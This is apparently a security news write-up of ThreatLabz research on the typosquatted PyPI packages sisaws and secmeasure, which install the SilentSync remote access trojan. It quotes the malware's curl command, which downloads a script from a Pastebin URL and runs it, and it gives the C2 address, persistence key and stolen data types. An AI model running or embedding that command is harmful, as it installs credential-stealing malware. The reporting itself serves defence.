Malicious Typosquatted PyPI Packages Spreading SilentSync RAT

On August 4, 2025, Zscaler ThreatLabz uncovered two malicious Python packages—sisaws and secmeasure—that deliver SilentSync, a Python-based remote access trojan (RAT), to unsuspecting developers.

Both packages leverage typosquatting to impersonate legitimate libraries in the Python Package Index (PyPI), posing a serious supply-chain risk to projects that install them.

SilentSync’s versatile capabilities include remote command execution, file exfiltration, screen capture, and web-browser data theft. The malware currently targets Windows systems but contains built-in persistence modules for Linux and macOS.

• On August 4, 2025, ThreatLabz identified two malicious PyPI packages—sisaws (typosquatting the legitimate sisa library) and secmeasure—created by the same author, that silently deploy SilentSync RAT upon import.
• SilentSync supports remote command execution, directory or file exfiltration (with ZIP compression), and screenshot capture.
• The RAT steals browser data from Chrome, Brave, Edge, and Firefox, including credentials, history, autofill records, and cookies.
• Both packages currently infect Windows systems exclusively, creating persistence by adding registry run-keys.
• SilentSync communicates over HTTP with a hardcoded C2 server using beaconing and task polling via REST endpoints.

Technical Analysis

ThreatLabz’s deep dive reveals that the sisaws package masquerades as the Argentine SISA API wrapper, mimicking modules such as puco and renaper to validate DNIs (Argentina’s National Identity Document) and retrieve structured healthcare responses.

However, its initialization script (init.py) hides a backdoor function, gen_token, guarded by a hardcoded token. When correctly invoked, gen_token forges an API-like response and issues a secondary static token to unlock malware delivery.

Under the hood, gen_token decodes a hex-encoded string to reveal a curl command that fetches helper.py from Pastebin and executes it:

textcurl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\helper.py && python %TEMP%\helper.py

This script is SilentSync, which begins persistence on Windows by creating a Run key under
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunPyHelper.

The secmeasure package, advertised as a string-sanitization library, shares the same author metadata and initialization backdoor.

Its sanitize_input function deploys the identical hex-encoded curl payload. Legitimate functions such as strip_whitespace, remove_special_chars, and normalize_unicode exist only as decoys; the package even raises NameError exceptions for missing imports to frustrate cursory inspection.

ThreatLabz tracked four releases between August 3 and 4, 2025: secmeasure versions 0.1.0, 0.1.1, 0.1.2, and sisaws version 2.1.6, indicating rapid iterations by the threat actor.

SilentSync RAT Capabilities

SilentSync decodes its hardcoded C2 IP (200.58.107[.]25) from Base64 at runtime, communicating via HTTP over TCP port 5000. It implements REST endpoints for stepwise operations:

Supported commands include:

Browser data theft is implemented for Chromium-family browsers and Firefox on Windows only. After exfiltration, SilentSync securely deletes local artifacts to evade detection.

The discovery of the sisaws and secmeasure packages underscores the evolving threat of typosquatting in public repositories.

By impersonating legitimate libraries and embedding backdoors that deploy SilentSync RAT, threat actors can infiltrate development environments and harvest sensitive data undetected.

Developers and security teams must adopt stricter package-validation measures—such as checksum verification, reputation-based filtering, and sandboxed testing—before integrating third-party dependencies.

Vigilance and proactive monitoring remain critical to safeguarding the software supply chain against silent, malicious implants.

Indicators Of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.